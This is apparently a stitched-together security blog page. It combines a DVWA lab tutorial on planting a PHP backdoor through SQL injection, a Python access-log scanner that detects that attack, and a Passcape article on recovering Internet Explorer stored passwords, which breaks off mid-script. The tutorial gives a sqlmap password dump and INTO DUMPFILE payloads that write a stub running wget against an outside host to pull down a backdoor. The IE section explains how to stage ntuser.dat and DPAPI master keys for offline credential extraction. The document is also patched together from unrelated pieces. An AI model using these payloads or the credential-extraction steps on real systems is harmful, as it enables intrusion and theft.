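# the loopback address. Feed it `ss -ltn` or `netstat -ltn` output on stdin.
# Added example for the WebGoat post; not part of WebGoat itself.

# Usage: ss -ltn | exposed_listeners 8080   (prints nothing when local-only)
exposed_listeners() {
    awk -v port="$1" '
        # Both tools print the local address as the 4th column, e.g.
        # "127.0.0.1:8080", "*:80", "[::]:22" or ":::22".
        $4 ~ (":" port "$") {
            addr = $4
            sub(/:[0-9]+$/, "", addr)
            if (addr != "127.0.0.1" && addr != "[::1]" && addr != "::1")
                print $4
        }'
}

# 0 when every listener on PORT is loopback-only, 1 otherwise.
port_is_local_only() {
    [ -z "$(exposed_listeners "$1")" ]
}
```

If the check reports *:8080 or [::]:8080 after ./webgoat.sh start8080, either bind Tomcat to 127.0.0.1 in its server.xml or put an iptables rule in front of the port before letting anyone else onto that network.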

Generate backdoor from SQL injection

To plant a backdoor through SQL injection, the web application must be vulnerable to SQL injection and the injected query must run as a MySQL account that has the FILE privilege, which INTO DUMPFILE requires. First we need the password of the MySQL account. That can be obtained in several ways, such as social engineering or dumping the password hashes with sqlmap (the hashes then still have to be cracked), for example:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --passwords

Once we have the password, we connect to MySQL with the following syntax (the server has to accept TCP connections from our host; many installations only listen on localhost):

root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p 


then press enter and input the password we got.
Now we are in the MySQL shell, and from here we can create databases and write files. This sample writes a small PHP stub into the web root that downloads the real backdoor from another host; it only works if the mysqld process is allowed to write to that directory and secure_file_priv does not restrict it:

mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)


now we access "bad.php"; when it runs, the PHP in it is executed, the backdoor cn.txt is downloaded into the dvwa directory and saved as bar.php. Note that the stub uses the PHP short open tag <?, which only works when short_open_tag is enabled on the server; <?php is the portable form.
finally, we can access bar.php at http://###.###.###.###/dvwa/bar.php

Other way :
we just insert the sql query to vulnerable form like this :

 1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php

and when we access the "a.php" file, "wget 192.168.56.1/cn.txt -O bar.php" will be executed and the backdoor will be downloaded by the server.
(This sample was tested in DVWA.)
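The detection-side counterpart to the technique above, as an added example that is not part of the original post: a small scanner that reads web server access-log lines, URL-decodes each request, flags the INTO DUMPFILE / INTO OUTFILE clause together with embedded PHP tags, shell-execution calls and remote fetches, and then correlates any later request for the file the injection tried to write. The log lines are constructed samples in Apache combined format; the indicator names and the `scan_log` / `parse_line` functions are my own.

```python
"""Scanner for SQL-injection file-write attempts in web access logs.
Added example (not code from the original post): URL-decodes each request,
flags INTO DUMPFILE / INTO OUTFILE, embedded PHP tags, shell-execution
calls and remote fetches, and correlates later requests for the file the
injection tried to write. SAMPLE_LOG is constructed, not real traffic."""
import os
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-style access log (sample data, not real traffic).
SAMPLE_LOG = """\
192.168.56.1 - - [12/Nov/2011:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521
192.168.56.1 - - [12/Nov/2011:10:01:09 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27+union+select+1%2C%22%3C%3F+system%28%27wget+192.168.56.1%2Fcn.txt+-O+bar.php%27%29%3B+%3F%3E%22+into+dumpfile+%27%2Fopt%2Flampp%2Fhtdocs%2Fdvwa%2Fa.php%27&Submit=Submit HTTP/1.1" 200 4533
192.168.56.1 - - [12/Nov/2011:10:01:15 +0700] "GET /dvwa/a.php HTTP/1.1" 200 0
192.168.56.1 - - [12/Nov/2011:10:01:20 +0700] "GET /dvwa/bar.php HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Indicators are evaluated against the URL-decoded request line.
SQL_FILE_WRITE_RE = re.compile(r"\binto\s+(?:dumpfile|outfile)\s+'([^']*)'", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|\s|=)")
CMD_EXEC_RE = re.compile(r"\b(?:system|exec|passthru|shell_exec|popen)\s*\(", re.IGNORECASE)
REMOTE_FETCH_RE = re.compile(r"\b(?:wget|curl)\s+\S+(?:\s+-[oO]\s+(?P<out>[^\s'\"]+))?")


def parse_line(line):
    """Split one access-log line into fields; returns None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["uri"])   # undo %xx and '+' encoding
    rec["path"] = urlsplit(rec["uri"]).path
    return rec


def scan_log(text):
    """Return findings: 1-based line number, client IP, path, indicator names
    and the file paths the request would write to the web root."""
    findings = []
    dropped = set()   # basenames of files an injection attempted to write so far
    for lineno, raw in enumerate(text.splitlines(), start=1):
        rec = parse_line(raw)
        if rec is None:
            continue
        decoded = rec["decoded"]
        indicators, writes = [], SQL_FILE_WRITE_RE.findall(decoded)
        if writes:
            indicators.append("sql_file_write")
        if PHP_TAG_RE.search(decoded):
            indicators.append("php_tag_in_request")
        if CMD_EXEC_RE.search(decoded):
            indicators.append("command_exec_in_request")
        fetch = REMOTE_FETCH_RE.search(decoded)
        if fetch:
            indicators.append("remote_fetch_in_request")
            if fetch.group("out"):          # "-O name" tells us a second file name
                writes.append(fetch.group("out"))
        # Correlation: a plain request for a file an earlier injection tried to write.
        if os.path.basename(rec["path"]) in dropped:
            indicators.append("access_to_injected_file")
        if indicators:
            findings.append({"line": lineno, "ip": rec["ip"], "path": rec["path"],
                             "indicators": indicators, "writes": writes})
        dropped.update(os.path.basename(p) for p in writes)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %d %s %s -> %s" % (f["line"], f["ip"], f["path"], ", ".join(f["indicators"])))
```

On the database side, the write shown in the post only succeeds if the application's MySQL account holds the FILE privilege and secure_file_priv does not restrict where files may be written; reviewing both is the configuration check that goes with this log rule.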

Saturday, May 14, 2011

Recovering Internet Explorer Passwords: Theory and Practice


1. Introduction
2. Types of passwords stored in Internet Explorer
2.1. Internet Credentials
2.2. AutoComplete data
2.3. AutoComplete passwords
2.4. FTP passwords
2.5. Synchronization passwords
2.6. Identities passwords
2.7. AutoForms data
2.8. Content Advisor password
3. Brief overview of Internet Explorer password recovery programs
4. PIEPR - the first acquaintance
5. Three real-life examples
5.1. Recovering current user's FTP passwords
5.2. Recovering website passwords from unloadable operating system
5.3. Recovering uncommonly stored passwords
6. Conclusion



1. Introduction
Nobody will likely dispute the fact that Internet Explorer is today's most popular Web browser. According to the statistics, approximately 70% of online users prefer this program. Arguments about its pros and cons may last forever; still, this browser is the leader of its industry, and that is a fact that requires no proof. Internet Explorer carries several built-in technologies designed to make the average user's life easier. One of them, IntelliSense, takes care of routine tasks like the automatic completion of visited webpage addresses, the automatic filling of form fields, users' passwords, etc.

Many of today's websites require registration, which means the user has to enter a user name and password. If you use more than a dozen such websites, you will likely need a password manager. All modern browsers have a built-in password manager in their arsenal, and Internet Explorer is no exception. Indeed, why remember yet another password if it is going to be forgotten soon anyway? It is much easier to have the browser do the routine work of remembering and storing passwords for you. It's convenient and comfortable.

This would be a totally perfect solution; however, if your Windows operating system crashes or is reinstalled improperly, you can easily lose the entire list of your precious passwords. That's the toll for the comfort and convenience. It is good that just about every website has a life-saving 'I forgot my password' button; however, this button will not always spare you the headache.

Each software developer solves the forgotten-password recovery problem their own way. Some of them officially recommend copying a couple of important files to another folder, others send all registered users a special utility for migrating private data, and still others pretend they do not see the problem. Nevertheless, demand creates supply, and password recovery programs are currently in great demand.

In this article, let's try to classify types of private data stored in Internet Explorer, look at programs for the recovery of the data, and study real-life examples of recovering lost Internet passwords.



2. Types of passwords stored in Internet Explorer
Internet Explorer may store the following types of passwords:
- Internet Credentials
- AutoComplete Data
- AutoComplete Passwords
- FTP Passwords
- Synchronization Passwords for cached websites
- Identities Passwords
- AutoForms Data
- Content Advisor Password
Let's take a closer look at each listed item.



2.1. Internet Credentials for websites
Internet credentials mean user's logins and passwords required for accessing certain websites, which are processed by the wininet.dll library. For example, when you try to enter the protected area of a website, you may see the following user name and password prompt (fig.1 http://www.passcape.com/images/ie01.png).

If the option 'Remember my password' is selected in that prompt, the user credentials will be saved to your local computer. The older Windows 9x versions stored that data in the user's PWL file; Windows 2000 and newer store it in the Protected Storage.


2.2. AutoComplete Data
AutoComplete data (passwords will be covered further on) are also stored in the Protected Storage and appear as lists of HTML form field names and the corresponding user data. For example, if an HTML page contains an e-mail address entry field, then once the user has entered his e-mail address, the Protected Storage will hold the HTML field name, the address value, and the time the record was last accessed.

The HTML page title and website address are not stored. Is that good or bad? It's difficult to say; more likely good than bad. The obvious pros: it saves disk space and speeds up the browser. If you think the last point is insignificant, imagine having to perform several extra lookups in an auto-fill list of several thousand entries (which is not as rare as it may seem).

Another obvious plus is that data for HTML form fields with identical names (and often identical purpose) will be stored in the same place, and the common data will be used for the automatic filling of such pages. Consider this example. If one HTML page contains an auto-fill field named 'email', and the user entered his e-mail address in that field, IE will put in the storage, roughly, 'email=my@email.com'. From now on, if the user opens another website that has a page with the same field name 'email', the user will be offered to auto-fill it with the value entered on the first page (my@email.com). Thus the browser shows a hint of intelligence of its own.

The major drawback of this data storage method follows from the advantage just described. Imagine a user has entered auto-fill data on a webpage. If someone knows the HTML form field name, that person can create his own simplest HTML page with the same field name and open it from a local disk. To uncover the data entered in this field, that person will not even have to connect to the Internet and open the original WWW address.



2.3. AutoComplete Passwords
With password data, however, as you might have guessed, the data will not be filled in automatically on another page, because auto-complete passwords are stored along with the Web page name, and each password is bound to one specific HTML page.

In the new version, Internet Explorer 7, both AutoComplete passwords and data are encrypted in a completely different way; the new encryption method is free from the shortcoming just described (if that can be classified as a shortcoming.)

It is worth noticing that Internet Explorer allows users to manage auto-fill parameters manually, through the options menu (fig.2 http://www.passcape.com/images/ie02.png).



2.4. FTP passwords
FTP site passwords are stored pretty much the same way. It is worth noting that beginning with Windows XP, FTP passwords are additionally encrypted with DPAPI. This encryption method uses the logon password. Naturally, this makes it much more difficult to recover such lost passwords manually, since now one would need to have the user's Master Key, SID and account password.

Starting with Microsoft Windows 2000, the operating system began to provide a Data Protection Application-Programming Interface (DPAPI) API. This is simply a pair of function calls that provide OS-level data protection services to user and system processes. By OS-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data through encryption. Since the data protection is part of the OS, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is a very easy-to-use service that will benefit developers that must provide protection for sensitive application data, such as passwords and private keys.
DPAPI is a password-based data protection service: it requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES and AES algorithms, and strong keys, which we'll cover in more detail later. Since DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user's logon password for protection.
DPAPI is not responsible for storing the confidential information it protects. It is only responsible for encrypting and decrypting data for programs that call it, such as Windows Credential manager, the Private Key storage mechanism, or any third-party programs.
Please refer to Microsoft Web site for more information.



2.5. Synchronization Passwords for cached websites
Synchronization passwords free user from having to enter passwords for cached websites (sites set to be available offline.) Passwords of this type are also stored in IE's Protected Storage.



2.6. Identities passwords
Identities passwords are stored there as well. The identity-based access management mechanism is not widespread in Microsoft's products, except, perhaps, Outlook Express.


2.7. AutoForms Data
A special paragraph must cover the form auto-fill method, which constitutes a hybrid way of storing data. This method stores the actual data in the Protected Storage, while the URL the data belong to is stored in the user's registry. The URL written in the registry is not stored as plaintext; it is stored as a hash. Here is the algorithm for reading form auto-fill data in IE 4 - 6:

===8<===========Begin of original text===========
//Get autoform password by given URL
BOOL CAutoformDecrypter::LoadPasswords(LPCTSTR cszUrl, CStringArray *saPasswords)
{
    assert(cszUrl && saPasswords);

    saPasswords->RemoveAll();

    //Check if autoform passwords are present in registry
    if ( EntryPresent(cszUrl) )
    {
        //Read PStore autoform passwords
        return PStoreReadAutoformPasswords(cszUrl,saPasswords);
    }

    return FALSE;
}


//Check if autoform passwords are present
BOOL CAutoformDecrypter::EntryPresent(LPCTSTR cszUrl)
{
    assert(cszUrl);

    DWORD dwRet, dwValue, dwSize=sizeof(dwValue);
    LPCTSTR cszHash=GetHash(cszUrl);

    //problems computing the hash
    if ( !cszHash )
        return FALSE;

    //Check the registry: the value name under IntelliForms\SPW is the URL hash
    dwRet=SHGetValue(HKCU,_T("Software\\Microsoft\\Internet Explorer\\IntelliForms\\SPW"),cszHash,NULL,&dwValue,&dwSize);
    delete[] (LPTSTR)cszHash;   //allocated with new[] in GetHash

    if ( dwRet==ERROR_SUCCESS )
        return TRUE;

    m_dwLastError=E_NOTFOUND;
    return FALSE;
}


//retrieve hash by given URL text and translate it into printable format
LPCTSTR CAutoformDecrypter::GetHash(LPCTSTR cszUrl)
{
    assert(cszUrl);

    BYTE buf[0x10];
    LPTSTR pRet=NULL;
    int i;

    if ( HashData(cszUrl,buf,sizeof(buf)) )
    {
        //Allocate some space
        pRet=new TCHAR [sizeof(buf) * sizeof(TCHAR) + sizeof(TCHAR)];
        if ( pRet)
        {
            for ( i=0; i<sizeof(buf); i++ )
            {
                // Translate it into human readable format:
                // keep 6 bits of each byte and shift into printable ASCII (0x20..0x5F)
                pRet[i]=(TCHAR) ((buf[i] & 0x3F) + 0x20);
            }
            pRet[i]=_T('\0');
        }
        else
            m_dwLastError=E_OUTOFMEMORY;
    }

    return pRet;
}


//DoHash wrapper
BOOL CAutoformDecrypter::HashData(LPCTSTR cszData, LPBYTE pBuf,
                                  DWORD dwBufSize)
{
    assert(cszData && pBuf);

    if ( !cszData || !pBuf )
    {
        m_dwLastError=E_ARG;
        return FALSE;
    }

    DoHash((LPBYTE)cszData,strlen(cszData),pBuf,dwBufSize);
    return TRUE;
}


void CAutoformDecrypter::DoHash(LPBYTE pData, DWORD dwDataSize,
                                LPBYTE pHash, DWORD dwHashSize)
{
    DWORD dw=dwHashSize, dw2;

    //pre-init loop: hash state starts as 0,1,2,...,dwHashSize-1
    while ( dw-->0 )
        pHash[dw]=(BYTE)dw;

    //actual hashing stuff: walk the data backwards, mixing every
    //input byte into every state byte through the permutation table
    while ( dwDataSize-->0 )
    {
        for ( dw=dwHashSize; dw-->0; )
        {
            //m_pPermTable = permutation table
            pHash[dw]=m_pPermTable[pHash[dw]^pData[dwDataSize]];
        }
    }
}
===8<============End of original text============

The next, seventh generation of the browser will most likely make this mechanism its primary way of storing user data, abandoning the good old Protected Storage. More precisely, auto-fill data and passwords will from now on be stored here.

What is so special and interesting in this mechanism that made MS decide to use it as primary? Well, first of all, it was the encryption idea, which isn't new at all but is simple and ingenious all the same. The idea is to stop storing encryption keys and instead generate them whenever they are needed. The raw material for such a key is the Web address of the HTML page.

Let's see how this idea works in action. Here is IE7's simplified algorithm for saving auto-fill data and password fields:

1 Save Web page's address. We will use this address as the encryption key (EncryptionKey).
2 Obtain Record Key. RecordKey = SHA(EncryptionKey).
3 Calculate checksum for RecordKey to ensure the integrity of the record key (the integrity of the actual data will be guaranteed by DPAPI.) RecordKeyCrc = CRC(RecordKey).
4 Encrypt data (passwords) with the encryption key EncryptedData = DPAPI_Encrypt(Data, EncryptionKey).
5 Save RecordKeyCrc + RecordKey + EncryptedData in the registry.
6 Discard EncryptionKey.

It is very, very difficult to recover a password without the original Web page address. The decryption looks pretty much trivial:

1 When the original Web page is open, we take its address (EncryptionKey) and obtain the record key RecordKey = SHA(EncryptionKey).
2 Browse through the list of all record keys trying to locate the RecordKey.
3 If the RecordKey is found, decrypt data stored along with this key using the EncryptionKey. Data = DPAPI_Decrypt(EncryptedData, EncryptionKey).
In spite of the seeming simplicity, this Web password encryption algorithm is one of today's strongest. However, it has a major drawback (or advantage, depending on which way you look at it.) If you change or forget the original Web page address, it will be impossible to recover the password for it.
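A runnable model of the save and lookup steps just listed, as an added example that is neither Passcape's nor Microsoft's code. The article does not name the hash or checksum variants, so the block assumes SHA-1 for SHA and CRC-32 for CRC, and it replaces DPAPI, which is a Windows-only service, with a clearly labelled XOR-keystream stand-in (`toy_dpapi`) so the record layout RecordKeyCrc + RecordKey + EncryptedData can be exercised offline. The `IntelliFormsStore` class name and the little-endian layout are my own choices.

```python
"""Model of the IE7 IntelliForms save/lookup scheme described above.
Added example, not Passcape's or Microsoft's code. Assumptions (not stated
on the page): SHA means SHA-1, CRC means CRC-32, and DPAPI is replaced by
a toy XOR keystream stand-in so the block runs offline; real DPAPI is a
Windows service and is NOT what is implemented here."""
import hashlib
import zlib


def record_key(encryption_key: str) -> bytes:
    """RecordKey = SHA(EncryptionKey); assumption: SHA-1 over the URL text."""
    return hashlib.sha1(encryption_key.encode("utf-8")).digest()


def record_key_crc(rk: bytes) -> int:
    """RecordKeyCrc = CRC(RecordKey); assumption: CRC-32."""
    return zlib.crc32(rk) & 0xFFFFFFFF


def toy_dpapi(data: bytes, encryption_key: str) -> bytes:
    """Stand-in for DPAPI_Encrypt / DPAPI_Decrypt (symmetric, so one function).
    Keystream = SHA-256(EncryptionKey || counter). NOT a real cipher and not
    DPAPI; it only lets the record layout be exercised offline."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream.extend(hashlib.sha256(encryption_key.encode("utf-8") + counter.to_bytes(4, "big")).digest())
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


class IntelliFormsStore:
    """Registry-like store: one record = RecordKeyCrc(4) + RecordKey(20) + EncryptedData."""

    def __init__(self):
        self.records = []   # nothing stored here reveals the URL

    def save(self, url: str, data: bytes) -> None:
        rk = record_key(url)                       # step 2
        crc = record_key_crc(rk)                   # step 3
        enc = toy_dpapi(data, url)                 # step 4 (stand-in)
        self.records.append(crc.to_bytes(4, "little") + rk + enc)   # step 5
        # step 6: the EncryptionKey (the URL itself) is discarded here

    def lookup(self, url: str):
        """Decrypt the record for url, or None if no record key matches."""
        rk = record_key(url)                       # decryption step 1
        for rec in self.records:                   # decryption step 2
            crc, stored_rk, enc = rec[:4], rec[4:24], rec[24:]
            if stored_rk != rk:
                continue
            if int.from_bytes(crc, "little") != record_key_crc(stored_rk):
                raise ValueError("record key checksum mismatch (corrupt record)")
            return toy_dpapi(enc, url)             # decryption step 3 (stand-in)
        return None


if __name__ == "__main__":
    store = IntelliFormsStore()
    store.save("http://example.test/login.html", b"alice:secret")
    print(store.lookup("http://example.test/login.html"))    # original URL: recovered
    print(store.lookup("http://example.test/login2.html"))   # changed URL: None
```

The last two lines of the demo are the point of the passage: with the original address the record is found and decrypted, and with any other address there is no record key to match, so nothing can even be attempted.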



2.8. Content Advisor password
And the last item on our list is the Content Advisor password. Content Advisor was originally developed as a tool for restricting access to certain websites. However, for some reason it was unloved by many users (surely, you may disagree with this.) If you once turned Content Advisor on, entered a password and then forgot it, you will not be able to access the majority of websites on the Internet. Fortunately (or unfortunately), this can be easily fixed.

The actual Content Advisor password is not stored as plaintext. Instead, the system calculates its MD5 hash and stores it in the Windows registry. On an attempt to access the restricted area, the password entered by the user is also hashed, and the obtained hash is compared with the one stored in the registry. Take a look at the PIEPR source code that checks the Content Advisor password:


===8<===========Begin of original text===========
void CContentAdvisorDlg::CheckPassword()
{
    CRegistry registry;

    //read the registry
    registry.SetKey(HKLM, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Ratings");

    BYTE pKey[MD5_DIGESTSIZE], pCheck[MD5_DIGESTSIZE];
    if ( !registry.GetBinaryData("Key",pKey,MD5_DIGESTSIZE) )
    {
        MessageBox(MB_ERR,"Can't read the password.");
        return;
    }

    //Get one set by user
    CString cs;
    m_wndEditPassword.GetWindowText(cs);
    MD5Init();
    //GetLength()+1: the terminating NUL is part of the hashed data
    MD5Update((LPBYTE)(LPCTSTR)cs,cs.GetLength()+1);
    MD5Final(pCheck);

    //Check hashes
    if ( memcmp(pKey,pCheck,MD5_DIGESTSIZE)==0 )
        MessageBox(MB_OK,"The password is correct!");
    else
        MessageBox(MB_OK,"Wrong password.");
}
===8<============End of original text============

The first thing that comes to mind is to recover the password by brute force or a dictionary attack. However, there is a more elegant way. You can simply remove the hash from the registry. That's it; so simple... Well, it's better to rename it instead, so that if you ever need it, you can restore it. Some programs also let users check the Content Advisor password, "drag out" the password hint, toggle the password on/off, etc.
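The same check in Python, as an added example rather than PIEPR code, to make the one detail that is easy to get wrong explicit: the C++ above hashes GetLength()+1 bytes, so the terminating NUL is part of the MD5 input and a plain MD5 of the password text will never match the stored value. The function names are my own, the stored key in the test is constructed from a sample password, and the block assumes the password is hashed as its 8-bit (ANSI) string, which is what the non-Unicode CString cast above does. The registry path and value name are the ones in the code above; `read_key_from_registry` uses the standard-library winreg module and simply returns None off Windows.

```python
"""Content Advisor password check as described above: MD5 over the password
bytes plus the terminating NUL, compared with the 16-byte 'Key' value.
Added example, not PIEPR code. Assumption: the password is hashed in its
8-bit (ANSI) encoding, as the C++ CString cast implies."""
import hashlib
import hmac

MD5_DIGESTSIZE = 16
# HKLM subkey holding the REG_BINARY value "Key" (path taken from the code above)
RATINGS_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings"


def content_advisor_key(password: str) -> bytes:
    """Compute the 16-byte value Windows stores for this password."""
    data = password.encode("cp1252") + b"\x00"   # the NUL terminator is hashed too
    return hashlib.md5(data).digest()


def check_password(entered: str, stored_key: bytes) -> bool:
    """True if 'entered' matches the stored hash; malformed keys are rejected."""
    if len(stored_key) != MD5_DIGESTSIZE:
        raise ValueError("Key value must be %d bytes" % MD5_DIGESTSIZE)
    # constant-time compare; the C++ code uses memcmp, which is not
    return hmac.compare_digest(content_advisor_key(entered), stored_key)


def read_key_from_registry():
    """On Windows, read the real value with winreg; elsewhere return None."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RATINGS_KEY) as key:
            value, kind = winreg.QueryValueEx(key, "Key")
    except OSError:
        return None
    return value if kind == winreg.REG_BINARY else None


if __name__ == "__main__":
    key = read_key_from_registry() or content_advisor_key("sample-pass")  # constructed fallback
    print("match:", check_password("sample-pass", key))
```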



3. Brief Overview of Internet Explorer Password Recovery Programs
It's worth noticing that not all password recovery programs are aware that passwords are stored in so many ways. Most likely, this is related to the fact that some passwords (e.g., synchronization passwords) are not often used in real life, and FTP passwords are not so simple to 'drag out'. Here is a brief overview of the most popular commercial products for recovering passwords for the most popular browser on earth :)

Advanced Internet Explorer Password Recovery from the well-known company ElcomSoft does not recognize AutoForm passwords and encrypted FTP passwords. It cannot be ruled out that the latest version of the program has learned to do that. Simple, convenient user interface. The program can be upgraded online automatically.

Internet Explorer Key from PassWare similarly does not recognize certain types of passwords. Sometimes the program halts with a critical error when reading some uncommon types of IE's URLs. It displays only the first two characters of the passwords being recovered. The advantages worth noticing are the Spartan user interface and operating convenience.

Internet Explorer Password from Thegrideon Software is not bad, but can recover just three types of Internet Explorer passwords (this is enough for the majority of cases.) Deals with FTP passwords properly. Version 1.1 has problems recovering AutoForm passwords. Has a convenient user interface, which somewhat resembles the one in AIEPR. One can be totally overwhelmed with the beauty and helpfulness of the company's website.

ABF Password Recovery from ABF software is quite a good program with a friendly user interface. The list of IE record types supported by the program is not long. Nevertheless, it deals with all of them properly. The program can be classified as a multi-functional one, since it can restore passwords for other programs as well.

The major drawback of all the programs named here is that they can recover passwords only for the user currently logged on.

As said above, the general body of stored Internet Explorer resources is kept in a special storage called Protected Storage. Protected Storage was developed specially for storing personal data; therefore the functions for working with it (called PS API) are not documented. Protected Storage was first introduced with the release of version 4 of Internet Explorer, which, by the way, unlike the third version, was written from scratch.

Protected Storage provides applications with an interface to store user data that must be kept secure or free from modification. Units of data stored are called Items. The structure and content of the stored data is opaque to the Protected Storage system. Access to Items is subject to confirmation according to a user-defined Security Style, which specifies what confirmation is required to access the data, such as whether a password is required. In addition, access to Items is subject to an Access rule set. There is an Access rule for each Access Mode: for example, read/write. Access rule sets are composed of Access Clauses. Typically at application setup time, a mechanism is provided to allow a new application to request from the user access to Items that may have been created previously by another application.
Items are uniquely identified by the combination of a Key, Type, Subtype, and Name. The Key is a constant that specifies whether the Item is global to this computer or associated only with this user. The Name is a string, generally chosen by the user. Type and Subtype are GUIDs, generally specified by the application. Additional information about Types and Subtypes is kept in the system registry and includes attributes such as Display Name and UI hints. For Subtypes, the parent Type is fixed and included in the system registry as an attribute. Items in a Type group are used for a common purpose: for example, Payment or Identification. Items in a Subtype group share a common data format.

So, until very recently, all programs for recovering Internet Explorer passwords used those undocumented APIs. That's the reason one significant restriction applied to the recovery work: PS API can only work with passwords for the user who is currently logged on. When the system encrypts data stored in Protected Storage, among other things it uses the user's SID, without which it is practically impossible (given current computing power) to recover stored passwords.

Protected Storage uses a very well thought-through data encryption method, which uses master keys and strong algorithms such as DES, SHA, and SHA-HMAC. Similar data encryption methods are now used in the majority of modern browsers, e.g., in Opera or Firefox. Microsoft, meanwhile, quietly but surely develops and tests new ones. At the time of writing, in the pre-Beta version of Internet Explorer 7, Protected Storage was only used for storing FTP passwords.

The analysis of this preliminary version suggests that Microsoft is preparing another 'surprise' in the form of new, interesting encryption algorithms. It is not known for sure, but most likely the company's new data protection technology, InfoCard, will be involved in the encryption of private data.

Thus, with a great deal of confidence one can assert that with the release of Windows Vista and the seventh version of Internet Explorer, passwords will be stored and encrypted with fundamentally new algorithms, and the Protected Storage interface, to all appearances, will become open to third-party developers.

It is somewhat sad, for we think the true potential of Protected Storage has still not been realized. And this is why we think so:
- First, Protected Storage has a modular structure, which allows plugging other storage providers into it. However, in the 10 years Protected Storage has existed, not a single new storage provider was created. System Protected Storage is the only storage provider in the operating system, and it is used by default.
- Second, Protected Storage has its own built-in access management system, which, for some reason, is not used in Internet Explorer or in other MS products.
- Third, it is not very clear why MS has decided to drop Protected Storage for storing AutoComplete data and passwords: to drop it as a tried-and-true data store, as opposed to a data encryption mechanism. It would have been more logical to keep Protected Storage at least for storing data when implementing a new encryption algorithm. No doubt there were weighty reasons for that. Therefore, it would be interesting to hear the opinion of MS specialists concerning this subject.


4. PIEPR - the First Acquaintance
Passcape Internet Explorer Password Recovery was developed specifically to bypass the PS API's restriction and make it possible to recover passwords directly, from the registry's binary files. Besides, it has a number of additional features for advanced users.

The program's wizard allows you to choose one of several operating modes:
- Automatic: Current user's passwords will be recovered by accessing the closed PS API interface. All current user's passwords currently stored in Internet Explorer will be recovered with a single click of the mouse.
- Manual: Passwords will be recovered without PS API. This method's main advantage is the capability to recover passwords from your old Windows account. For that purpose, you will need to enter path to the user's registry file. Registry files are normally not available for reading; however, the technology used in PIEPR allows doing that (provided you have the local administrative rights.)

The user's registry file name is ntuser.dat; it resides in the user's profile, which is normally %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%, where %SYSTEMDRIVE% stands for the system disk with the operating system, and %USERNAME% is normally the account name. For instance, the path to the registry file may look like this: C:\Documents and Settings\John\ntuser.dat

If you have ever been a happy owner of Windows 9x/ME, after you upgrade your operating system to Windows NT, Protected Storage will providently save a copy of your old private data. As a result of that, Protected Storage may contain several user identifiers, so PIEPR will ask you to select the right one before it gets to the decryption of the data (fig.3 http://www.passcape.com/images/ie03.png).

One of the listed SIDs will contain data left by the old Windows 9x/ME. That data is additionally encrypted with user's logon password, and PIEPR currently does not support the decryption of such data.

If ntuser.dat contains encrypted passwords (e.g., FTP sites passwords), the program will need additional information in order to decrypt them (fig.4 http://www.passcape.com/images/ie04.png):
- Logon password of user whose data are to be decrypted
- Full path to the user's MasterKey
- User's SID

Normally, the program finds the last two items in the user's profile and fills in that data automatically. However, if ntuser.dat was copied from another operating system, you will have to take care of that on your own. The easiest way to get the job done is to copy the entire folder with the user's Master Key (there may be several of them) to the folder with ntuser.dat. The Master Key resides in the following folder on your local computer: %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%\Application Data\Microsoft\Protect\%UserSid%, where %SYSTEMDRIVE% stands for the system disk with the operating system, %USERNAME% is the account name, and %UserSid% is the user's SID. For example, the path to the folder with a master key may look as follows: C:\Documents and Settings\John\Application Data\Microsoft\Protect\S-1-5-21-1587165142-6173081522-185545743-1003. To be clear, it is recommended to copy the entire folder S-1-5-21-1587165142-6173081522-185545743-1003, for it may contain several Master Keys. PIEPR will then select the right key automatically.

Windows marks some folders as hidden or system, so they are invisible in Windows Explorer. To make them visible, enable showing hidden and system objects in the view settings or use an alternative file manager.

Once the folder with the user's Master Key has been copied to the folder with ntuser.dat, PIEPR will automatically find the required data, so you will only have to enter the user's password to recover FTP passwords.
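A script that does the staging described in the manual-mode paragraphs above, as an added example that is not PIEPR code: given a profile directory, it locates ntuser.dat and every per-SID folder under Application Data\Microsoft\Protect, then copies ntuser.dat and each SID folder whole (as the article advises, since a folder may hold several Master Keys) into one staging folder. It runs anywhere because `build_demo_profile` constructs a sample Windows XP-style profile tree in a temporary directory; the SID in that tree is the one from the article's example path, the GUID file name is invented, and the function names are my own. Master key files are matched by their GUID-shaped names, which is how Windows names them.

```python
"""Locate and stage the offline-recovery inputs described above: ntuser.dat
and the per-SID DPAPI Master Key folders under Application Data\\Microsoft\\Protect.
Added example (not PIEPR code); the profile tree built below is constructed."""
import os
import re
import shutil
import tempfile

SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-\d+$")
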